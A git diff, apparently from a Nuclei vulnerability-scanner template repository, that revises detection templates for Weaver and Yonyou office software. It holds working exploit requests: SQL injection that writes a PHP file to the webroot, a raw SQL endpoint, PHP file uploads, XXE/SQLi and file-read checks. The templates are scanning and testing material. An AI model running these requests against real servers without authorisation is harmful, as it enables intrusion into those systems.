"{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version" + # - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)" + - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=" stop-at-first-match: true matchers: diff --git a/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml index 37c185a222..b1b7a7bf2f 100755 --- a/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml +++ b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml @@ -17,7 +17,7 @@ info: variables: filename: "{{to_lower(rand_base(5))}}" - payload: "[group]:[1]|[groupid]:[1 union select '',2,3,4,5,6,7,8 into outfile '../webroot/{{filename}}.php']" + payload: "[group]:[1]|[groupid]:[1 union select '',2,3,4,5,6,7,8 into outfile '../webroot/{{filename}}.php']" http: - raw: @@ -35,9 +35,7 @@ http: - type: word part: body_2 words: - - "PHP Version" - - "PHP Extension" - condition: and + - "758058d8987e7a9ec723bcdbec6c407e" - type: status status: diff --git a/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml b/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml index 901bd23ef0..c64cb2adf5 100755 --- a/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml @@ -51,7 +51,7 @@ http: matchers-condition: and matchers: - type: dsl - dsl: + dsl: - "status_code_1 == 200" - "status_code_3 == 200 && contains(body_3,'{{string}}')" - condition: and + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml b/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml index ded95bff68..aa034a39c5 100755 --- a/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml @@ -43,7 +43,7 @@ http: matchers-condition: and matchers: - type: dsl - dsl: + dsl: - "status_code_1 == 200 && contains_all(body_1,'original', 'SUCCESS')" - "contains(body_2, '{{result}}') && status_code_2 == 200" condition: and diff --git a/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml b/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml index 46aea1864c..f8665fcc3d 100755 --- a/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml @@ -10,7 +10,7 @@ info: max-request: 1 fofa-query: app="泛微-EOffice" verified: true - tags: weaver,e-office,oa,instrusive,rce + tags: weaver,e-office,intrusive,rce,file-upload variables: filename: "{{to_lower(rand_base(5))}}" @@ -59,7 +59,7 @@ http: matchers-condition: and matchers: - type: dsl - dsl: + dsl: - "status_code_1 == 200" - "contains(body_2, 'attachmentID') && contains(body_2, 'attachmentName')" - "status_code_3 == 200 && contains(body_3,'{{randstr}}')" diff --git a/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml b/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml index 965c468ad5..a9c42554d5 100644 --- a/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml +++ b/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml @@ -33,7 +33,7 @@ http: matchers-condition: and matchers: - type: dsl - dsl: + dsl: - "status_code_1 == 200 && contains(body_1,'{{timestamp}}')" - "status_code_2 == 200 && contains(body_2,'新建')" - condition: and + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml index a9090fb0cf..26a4134b10 100755 --- a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml @@ -1,7 +1,7 @@ id: weaver-office-server-file-upload info: - name: OA E-Office OfficeServer.php Arbitrary File Upload + name: OA E-Office OfficeServer.php Arbitrary File Upload author: SleepingBag945 severity: critical description: | @@ -12,7 +12,7 @@ info: max-request: 1 fofa-query: app="泛微-EOffice" verified: true - tags: weaver,e-office,oa,rce,intrusive,file-upload + tags: weaver,e-office,oa,rce,intrusive,fileupload variables: filename: "{{to_lower(rand_base(5))}}" @@ -31,9 +31,7 @@ http: Content-Disposition: form-data;name="FileData";filename="{{filename}}.php" Content-Type: application/octet-stream - <?php - phpinfo(); - ?> + <?php echo md5(weaver);?>' ------WebKitFormBoundaryLpoiBFy4ANA8daew Content-Disposition: form-data;name="FormData" @@ -50,9 +48,7 @@ http: - type: word part: body_2 words: - - "PHP Version" - - "PHP Extension" - condition: and + - "758058d8987e7a9ec723bcdbec6c407e" - type: status status: diff --git a/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml b/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml index c3017184b9..cc50a7c997 100755 --- a/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml +++ b/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml @@ -24,8 +24,8 @@ http: - type: word part: body words: - - "datapassword" - - "datauser" + - "datapassword =" + - "datauser =" condition: and - type: status diff --git a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml index b34c91983f..c5ffdcbcc3 100755 --- a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml @@ -44,7 +44,7 @@ http: matchers-condition: and matchers: - type: dsl - dsl: + dsl: - "status_code_1 == 200" - "contains(body_2, 'imageSrc') && contains(body_2, 'height')" - "status_code_3 == 200 && contains(body_3,'{{randstr}}')" diff --git a/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml b/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml index 51647b3a29..c9ae09300c 100755 --- a/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml @@ -11,7 +11,7 @@ info: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/weaver-oa-workrelate-file-upload.yaml metadata: fofa-query: app="泛微-协同办公OA" - tags: ecology,upload,fileupload,intrusive + tags: ecology,fileupload,intrusive variables: filename: "{{to_lower(rand_base(5))}}" @@ -65,12 +65,12 @@ http: internal: true group: 1 regex: - - "&fileid=(.*?)\'>" + - "&fileid=(.*?)\\'>" matchers-condition: and matchers: - type: dsl - dsl: + dsl: - "status_code_1 == 200 && contains(body_1,'workrelate/plan/util/ViewDoc')" - "status_code_2 == 200 && contains(body_2, 'println')" - "status_code_3 == 200 && contains(body_3,'{{string}}')" diff --git a/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml b/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml index 7bf1c2d19c..eda14230b5 100755 --- a/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml +++ b/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml @@ -9,7 +9,7 @@ info: reference: | - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 2 + max-request: 2 fofa-query: body="远程通CHANJET_Remote" verified: true tags: yonyou,chanjet,sqli diff --git a/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml index 876afbcecc..cd227fa523 100755 --- a/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml @@ -12,7 +12,7 @@ info: max-request: 1 fofa-query: app="用友-UFIDA-NC" verified: true - tags: yonyou,fileupload,intrusive + tags: yonyou,file-upload,intrusive variables: file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp" diff --git a/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml b/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml index 07588ff47c..4a8f9d142f 100755 --- a/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml +++ b/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml @@ -9,6 +9,11 @@ info: - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html tags: yonyou,grp,xxe,sqli +variables: + num1: "{{rand_int(800000, 999999)}}" + num2: "{{rand_int(800000, 999999)}}" + result: "{{to_number(num1)*to_number(num2)}}" + http: - raw: - | @@ -17,13 +22,14 @@ http: Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip - cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%2042540%2a41369%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e + cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%20{{num1}}%2a{{num2}}%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e matchers-condition: and matchers: - type: word + part: body words: - - "1759837260" + - "{{result}}" - type: word words: diff --git a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml index c6b814fe88..dd24e1b370 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml @@ -10,9 +10,9 @@ info: - https://www.seebug.org/vuldb/ssvid-99547 - https://github.com/Augensternyu/POC-bomber/blob/main/pocs/redteam/yongyou_nc_fileupload_2022.py metadata: - max-request: 2 + max-request: 2 fofa-query: app="用友-UFIDA-NC - verified: true + verified: true tags: yonyou,intrusive,ufida,fileupload variables: diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml index 48a7a4d7d6..91eeb60c80 100644 --- a/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml @@ -10,7 +10,7 @@ info: max-request: 2 fofa-query: body="用友U8CRM" verified: true - tags: yonyou,fileupload,u8-crm + tags: yonyou,file-upload,u8-crm,intrusive http: - raw: